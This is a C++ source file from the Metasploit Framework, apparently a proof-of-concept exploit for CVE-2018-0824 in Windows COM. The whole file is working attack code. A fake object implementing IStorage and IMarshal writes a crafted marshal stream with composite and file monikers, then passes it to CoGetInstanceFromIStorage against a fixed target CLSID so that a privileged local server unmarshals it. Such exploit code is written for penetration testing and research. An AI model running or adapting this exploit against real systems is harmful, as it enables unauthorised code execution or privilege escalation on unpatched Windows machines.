rapid7/metasploit-framework

View on GitHub
external/source/exploits/CVE-2018-0824/UnmarshalPwn.cpp

Summary

Maintainability
Test Coverage
// UnmarshalPwn.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <stdio.h>
#include <tchar.h>
#include <string>
#include <comdef.h>
#include <winternl.h>
#include <ole2.h>
#include <Shlwapi.h>
#include <strsafe.h>
#include <vector>
#include <stdlib.h>

#pragma comment(lib, "shlwapi.lib")

// CLSID that FakeObject::GetUnmarshalClass reports and that
// FakeObject::MarshalInterface writes into the marshal stream.
GUID marshalInterceptorGUID = { 0xecabafcb,0x7f19,0x11d2,{ 0x97,0x8e,0x00,0x00,0xf8,0x75,0x7e,0x2a } };
// GUID written into the marshal stream between the two `monikers` counts;
// presumably the composite moniker CLSID, going by the name -- confirm.
GUID compositeMonikerGUID = { 0x00000309,0x0000,0x0000,{ 0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 } };
// All-zero block; MarshalInterface writes only the first 12 bytes of it.
// NOTE(review): declared as 12 UINTs, so the array itself is larger than the 12 bytes used.
UINT header[] = { 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 };
// MarshalInterface writes the first 4 bytes of this array (the UINT value 2) twice.
UINT monikers[] = { 0x02,0x00,0x00,0x00 };
// CLSID instantiated with CoCreateInstance in MarshalInterface and then saved to the stream.
GUID newMonikerGUID = { 0xecabafc6,0x7f19,0x11d2,{ 0x97,0x8e,0x00,0x00,0xf8,0x75,0x7e,0x2a } };
// Filled by CoCreateGuid in Exploit().
GUID random;
// String form of `random` (set by StringFromCLSID in Exploit()); used as the
// compound-file name and copied into the STATSTG name by FakeObject::Stat.
OLECHAR* randomString;

// Returns the string form of `riid` as produced by StringFromIID, or the
// literal "Unknown" when that conversion fails. The temporary OLE string is
// released with CoTaskMemFree once it has been copied into the bstr_t.
static bstr_t IIDToBSTR(REFIID riid)
{
    bstr_t text = "Unknown";
    LPOLESTR iidText = nullptr;

    if (FAILED(StringFromIID(riid, &iidText)))
    {
        return text;
    }

    text = iidText;
    CoTaskMemFree(iidText);
    return text;
}

// Views a GUID as its raw in-memory bytes. The returned pointer aliases `g`,
// so it is only usable while `g` itself is alive.
unsigned char const* GuidToByteArray(GUID const& g)
{
    GUID const* const address = &g;
    return reinterpret_cast<unsigned char const*>(address);
}

// COM object that implements both IStorage and IMarshal.
//
// The IStorage methods log each call and mostly forward to the wrapped storage
// `_stg`. The IMarshal methods provide custom marshaling: GetUnmarshalClass
// reports marshalInterceptorGUID and MarshalInterface writes a hand-built
// byte sequence (header, GUIDs, counts and two saved monikers) to the stream.
class FakeObject : public IMarshal, public IStorage
{
    // COM reference count; starts at 1 in the constructor.
    LONG m_lRefCount;
    // Real storage that the IStorage methods delegate to.
    IStoragePtr _stg;
    // Path handed to CreateFileMoniker in MarshalInterface. Not owned: this
    // class never frees it.
    wchar_t *pFilePath = NULL;

public:
    // Stores the storage to wrap and the path used later for the file moniker.
    FakeObject(IStoragePtr storage, wchar_t *pValue) {
        _stg = storage;
        m_lRefCount = 1;
        pFilePath = pValue;
    }

    ~FakeObject() {};

    //IUnknown
    // Answers IUnknown, IStorage and IMarshal (logging which one was asked
    // for); any other IID is logged and rejected with E_NOINTERFACE.
    // On success the returned interface is AddRef'd.
    HRESULT __stdcall QueryInterface(REFIID riid, LPVOID *ppvObj)
    {
        if (riid == __uuidof(IUnknown))
        {
            printf("Query for IUnknown\n");
            *ppvObj = this;
        }
        else if (riid == __uuidof(IStorage))
        {
            printf("Query for IStorage\n");
            *ppvObj = static_cast<IStorage*>(this);
        }
        else if (riid == __uuidof(IMarshal))
        {
            printf("Query for IMarshal\n");
            *ppvObj = static_cast<IMarshal*>(this);
        }
        else
        {
            printf("Unknown IID: %ls %p\n", IIDToBSTR(riid).GetBSTR(), this);
            *ppvObj = NULL;
            return E_NOINTERFACE;
        }

        ((IUnknown*)*ppvObj)->AddRef();
        return NOERROR;
    }

    // Atomically increments the reference count and returns the new value.
    ULONG __stdcall AddRef()
    {
        return InterlockedIncrement(&m_lRefCount);
    }

    // Atomically decrements the reference count; deletes the object when the
    // count reaches zero. Returns the new count.
    ULONG __stdcall Release()
    {
        ULONG  ulCount = InterlockedDecrement(&m_lRefCount);

        if (0 == ulCount)
        {
            delete this;
        }

        return ulCount;
    }

    // IStorage
    // Logs and forwards to the wrapped storage, returning its HRESULT.
    virtual HRESULT STDMETHODCALLTYPE CreateStream(
        /* [string][in] */ __RPC__in_string const OLECHAR *pwcsName,
        /* [in] */ DWORD grfMode,
        /* [in] */ DWORD reserved1,
        /* [in] */ DWORD reserved2,
        /* [out] */ __RPC__deref_out_opt IStream **ppstm) {
        printf("Call: CreateStream\n");
        return _stg->CreateStream(pwcsName, grfMode, reserved1, reserved2, ppstm);

    }

    // Logs and forwards to the wrapped storage.
    // NOTE(review): the inner HRESULT is discarded and S_OK is always
    // returned, unlike CreateStream -- confirm this is intentional.
    virtual /* [local] */ HRESULT STDMETHODCALLTYPE OpenStream(
        /* [annotation][string][in] */
        _In_z_  const OLECHAR *pwcsName,
        /* [annotation][unique][in] */
        _Reserved_  void *reserved1,
        /* [in] */ DWORD grfMode,
        /* [in] */ DWORD reserved2,
        /* [annotation][out] */
        _Outptr_  IStream **ppstm) {
        printf("Call: OpenStream\n");
        _stg->OpenStream(pwcsName, reserved1, grfMode, reserved2, ppstm);
        return S_OK;
    }

    // Logs and forwards to the wrapped storage; always returns S_OK
    // regardless of the inner result.
    virtual HRESULT STDMETHODCALLTYPE CreateStorage(
        /* [string][in] */ __RPC__in_string const OLECHAR *pwcsName,
        /* [in] */ DWORD grfMode,
        /* [in] */ DWORD reserved1,
        /* [in] */ DWORD reserved2,
        /* [out] */ __RPC__deref_out_opt IStorage **ppstg) {
        printf("Call: CreateStorage\n");
        _stg->CreateStorage(pwcsName, grfMode, reserved1, reserved2, ppstg);
        return S_OK;
    }

    // Logs and forwards to the wrapped storage; always returns S_OK
    // regardless of the inner result.
    virtual HRESULT STDMETHODCALLTYPE OpenStorage(
        /* [string][unique][in] */ __RPC__in_opt_string const OLECHAR *pwcsName,
        /* [unique][in] */ __RPC__in_opt IStorage *pstgPriority,
        /* [in] */ DWORD grfMode,
        /* [unique][in] */ __RPC__deref_opt_in_opt SNB snbExclude,
        /* [in] */ DWORD reserved,
        /* [out] */ __RPC__deref_out_opt IStorage **ppstg) {
        printf("Call: OpenStorage\n");
        _stg->OpenStorage(pwcsName, pstgPriority, grfMode, snbExclude, reserved, ppstg);
        return S_OK;
    }

    // Logs and forwards to the wrapped storage; always returns S_OK
    // regardless of the inner result.
    virtual /* [local] */ HRESULT STDMETHODCALLTYPE CopyTo(
        /* [in] */ DWORD ciidExclude,
        /* [annotation][size_is][unique][in] */
        _In_reads_opt_(ciidExclude)  const IID *rgiidExclude,
        /* [annotation][unique][in] */
        _In_opt_  SNB snbExclude,
        /* [annotation][unique][in] */
        _In_  IStorage *pstgDest) {
        printf("Call: CopyTo\n");
        _stg->CopyTo(ciidExclude, rgiidExclude, snbExclude, pstgDest);
        return S_OK;
    }

    // Logs and forwards to the wrapped storage; always returns S_OK
    // regardless of the inner result.
    virtual HRESULT STDMETHODCALLTYPE MoveElementTo(
        /* [string][in] */ __RPC__in_string const OLECHAR *pwcsName,
        /* [unique][in] */ __RPC__in_opt IStorage *pstgDest,
        /* [string][in] */ __RPC__in_string const OLECHAR *pwcsNewName,
        /* [in] */ DWORD grfFlags) {
        printf("Call: MoveElementTo\n");
        _stg->MoveElementTo(pwcsName, pstgDest, pwcsNewName, grfFlags);
        return S_OK;
    }

    // Logs and forwards to the wrapped storage; always returns S_OK
    // regardless of the inner result.
    virtual HRESULT STDMETHODCALLTYPE Commit(
        /* [in] */ DWORD grfCommitFlags) {
        printf("Call: Commit\n");
        _stg->Commit(grfCommitFlags);
        return S_OK;
    }

    // Logs only; nothing is forwarded to the wrapped storage.
    virtual HRESULT STDMETHODCALLTYPE Revert(void) {
        printf("Call:  Revert\n");
        return S_OK;
    }

    // Logs and forwards to the wrapped storage; always returns S_OK
    // regardless of the inner result.
    virtual /* [local] */ HRESULT STDMETHODCALLTYPE EnumElements(
        /* [annotation][in] */
        _Reserved_  DWORD reserved1,
        /* [annotation][size_is][unique][in] */
        _Reserved_  void *reserved2,
        /* [annotation][in] */
        _Reserved_  DWORD reserved3,
        /* [annotation][out] */
        _Outptr_  IEnumSTATSTG **ppenum) {
        printf("Call:  EnumElements\n");
        _stg->EnumElements(reserved1, reserved2, reserved3, ppenum);
        return S_OK;
    }

    // Logs and forwards to the wrapped storage; always returns S_OK
    // regardless of the inner result.
    virtual HRESULT STDMETHODCALLTYPE DestroyElement(
        /* [string][in] */ __RPC__in_string const OLECHAR *pwcsName) {
        printf("Call:  DestroyElement\n");
        _stg->DestroyElement(pwcsName);
        return S_OK;
    }

    // Logs only; nothing is forwarded to the wrapped storage.
    virtual HRESULT STDMETHODCALLTYPE RenameElement(
        /* [string][in] */ __RPC__in_string const OLECHAR *pwcsOldName,
        /* [string][in] */ __RPC__in_string const OLECHAR *pwcsNewName) {
        printf("Call:  RenameElement\n");
        return S_OK;

    };

    // Logs only; nothing is forwarded to the wrapped storage.
    virtual HRESULT STDMETHODCALLTYPE SetElementTimes(
        /* [string][unique][in] */ __RPC__in_opt_string const OLECHAR *pwcsName,
        /* [unique][in] */ __RPC__in_opt const FILETIME *pctime,
        /* [unique][in] */ __RPC__in_opt const FILETIME *patime,
        /* [unique][in] */ __RPC__in_opt const FILETIME *pmtime) {
        printf("Call:  SetElementTimes\n");
        return S_OK;
    }

    // Logs only; nothing is forwarded to the wrapped storage.
    virtual HRESULT STDMETHODCALLTYPE SetClass(
        /* [in] */ __RPC__in REFCLSID clsid) {
        printf("Call:  SetClass\n");
        return S_OK;
    }

    // Logs only; nothing is forwarded to the wrapped storage.
    virtual HRESULT STDMETHODCALLTYPE SetStateBits(
        /* [in] */ DWORD grfStateBits,
        /* [in] */ DWORD grfMask) {
        printf("Call:  SetStateBits\n");
        return S_OK;
    }

    // Copies the global randomString into a CoTaskMemAlloc'd buffer, stores it
    // as the STATSTG name, then calls Stat on the wrapped storage with the
    // same structure. Always returns S_OK; `hr` is assigned but never read.
    // NOTE(review): the inner Stat call runs after the name is set and
    // receives the same struct, so it may replace pwcsName and orphan the
    // buffer allocated here -- confirm the intended ordering.
    // NOTE(review): the CoTaskMemAlloc result is not checked for NULL.
    virtual HRESULT STDMETHODCALLTYPE Stat(
        /* [out] */ __RPC__out STATSTG *pstatstg,
        /* [in] */ DWORD grfStatFlag) {
        printf("Call:  Stat\n");
        HRESULT hr = 0;
        size_t len = 0;

        // +1 leaves room for the terminating null character.
        len = wcsnlen_s(randomString, MAX_PATH) + 1;
        PWCHAR s = (PWCHAR)CoTaskMemAlloc(len * sizeof(WCHAR));
        wcscpy_s(s, len, randomString);
        pstatstg[0].pwcsName = s;
        hr = _stg->Stat(pstatstg, grfStatFlag);
        printf("End:  Stat\n");
        return S_OK;
    }

    // IMarshal
    // Reports marshalInterceptorGUID as the unmarshal class, whatever the
    // requested interface or destination context.
    virtual HRESULT STDMETHODCALLTYPE GetUnmarshalClass(
        /* [annotation][in] */
        _In_  REFIID riid,
        /* [annotation][unique][in] */
        _In_opt_  void *pv,
        /* [annotation][in] */
        _In_  DWORD dwDestContext,
        /* [annotation][unique][in] */
        _Reserved_  void *pvDestContext,
        /* [annotation][in] */
        _In_  DWORD mshlflags,
        /* [annotation][out] */
        _Out_  CLSID *pCid)
    {
        printf("Call:  GetUnmarshalClass\n");
        *pCid = marshalInterceptorGUID; // ECABAFCB-7F19-11D2-978E-0000F8757E2A
        return S_OK;
    }

    // Reports a fixed upper bound of 1024 bytes for the marshaled data.
    virtual HRESULT STDMETHODCALLTYPE GetMarshalSizeMax(
        /* [annotation][in] */
        _In_  REFIID riid,
        /* [annotation][unique][in] */
        _In_opt_  void *pv,
        /* [annotation][in] */
        _In_  DWORD dwDestContext,
        /* [annotation][unique][in] */
        _Reserved_  void *pvDestContext,
        /* [annotation][in] */
        _In_  DWORD mshlflags,
        /* [annotation][out] */
        _Out_  DWORD *pSize)
    {
        printf("Call:  GetMarshalSizeMax\n");
        *pSize = 1024;
        return S_OK;
    }

    // Writes the custom marshal payload to pStm, in this order:
    //   12 bytes of `header`, marshalInterceptorGUID, 4 bytes of `monikers`,
    //   compositeMonikerGUID, 4 bytes of `monikers` again, then a file moniker
    //   for pFilePath and an instance of newMonikerGUID, both saved with
    //   OleSaveToStream.
    // Always returns S_OK.
    // NOTE(review): every HRESULT assigned to `hr` is overwritten without
    // being checked, so a failed CreateFileMoniker/CoCreateInstance would
    // leave a null pointer to be passed to OleSaveToStream.
    // NOTE(review): `context` is created but not used afterwards in this method.
    virtual HRESULT STDMETHODCALLTYPE MarshalInterface(
        /* [annotation][unique][in] */
        _In_  IStream *pStm,
        /* [annotation][in] */
        _In_  REFIID riid,
        /* [annotation][unique][in] */
        _In_opt_  void *pv,
        /* [annotation][in] */
        _In_  DWORD dwDestContext,
        /* [annotation][unique][in] */
        _Reserved_  void *pvDestContext,
        /* [annotation][in] */
        _In_  DWORD mshlflags)
    {
        printf("Call:  MarshalInterface\n");
        ULONG written = 0;
        HRESULT hr = 0;
        pStm->Write(header, 12, &written);
        pStm->Write(GuidToByteArray(marshalInterceptorGUID), 16, &written);

        IMonikerPtr fileMoniker;
        IMonikerPtr newMoniker;
        IBindCtxPtr context;

        pStm->Write(monikers, 4, &written);
        pStm->Write(GuidToByteArray(compositeMonikerGUID), 16, &written);
        pStm->Write(monikers, 4, &written);
        hr = CreateBindCtx(0, &context);
        hr = CreateFileMoniker(pFilePath, &fileMoniker);
        hr = CoCreateInstance(newMonikerGUID, NULL, CLSCTX_ALL, IID_IUnknown, (LPVOID*)&newMoniker);
        hr = OleSaveToStream(fileMoniker, pStm);
        hr = OleSaveToStream(newMoniker, pStm);
        return S_OK;
    }

    // Not supported: logs the call and returns E_NOTIMPL.
    virtual HRESULT STDMETHODCALLTYPE UnmarshalInterface(
        /* [annotation][unique][in] */
        _In_  IStream *pStm,
        /* [annotation][in] */
        _In_  REFIID riid,
        /* [annotation][out] */
        _Outptr_  void **ppv)
    {
        printf("Call:  UnmarshalInterface\n");
        return E_NOTIMPL;
    }

    // Logs only; the stream is left untouched.
    virtual HRESULT STDMETHODCALLTYPE ReleaseMarshalData(
        /* [annotation][unique][in] */
        _In_  IStream *pStm)
    {
        printf("Call:  ReleaseMarshalData\n");
        return S_OK;
    }

    // Logs only.
    virtual HRESULT STDMETHODCALLTYPE DisconnectObject(
        /* [annotation][in] */
        _In_  DWORD dwReserved)
    {
        printf("Call: DisconnectObject\n");
        return S_OK;
    }
};

// Passes a successful HRESULT straight through to the caller; a failing one is
// turned into a thrown _com_error carrying the same code.
static HRESULT Check(HRESULT hr)
{
    if (SUCCEEDED(hr))
    {
        return hr;
    }

    throw _com_error(hr);
}

void Exploit(wchar_t *pValue)
{
    HRESULT hr = 0;
    IStoragePtr storage = nullptr;
    MULTI_QI* qi = new MULTI_QI[1];

    GUID target_GUID = { 0x7d096c5f,0xac08,0x4f1f,{ 0xbe,0xb7,0x5c,0x22,0xc5,0x17,0xce,0x39 } };
    hr = CoCreateGuid(&random);

    StringFromCLSID(random, &randomString);
    StgCreateDocfile(randomString, STGM_CREATE | STGM_READWRITE | STGM_SHARE_EXCLUSIVE, 0, &storage);

    IStoragePtr pFake = new FakeObject(storage, pValue);

    qi[0].pIID = &IID_IUnknown;
    qi[0].pItf = NULL;
    qi[0].hr = 0;

    CoGetInstanceFromIStorage(NULL, &target_GUID, NULL, CLSCTX_LOCAL_SERVER, pFake, 1, qi);

}

class CoInit
{
public:
    CoInit()
    {
        Check(CoInitialize(nullptr));
        Check(CoInitializeSecurity(nullptr, -1, nullptr, nullptr, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, nullptr, NULL, nullptr));
    }

    ~CoInit()
    {
        CoUninitialize();
    }
};


int wmain(int argc, wchar_t** argv)
{
    try
    {
        CoInit ci;

        Exploit(argv[1]);

    }
    catch (const _com_error& err)
    {
        printf("Error: %ls\n", err.ErrorMessage());
    }

    return 0;
}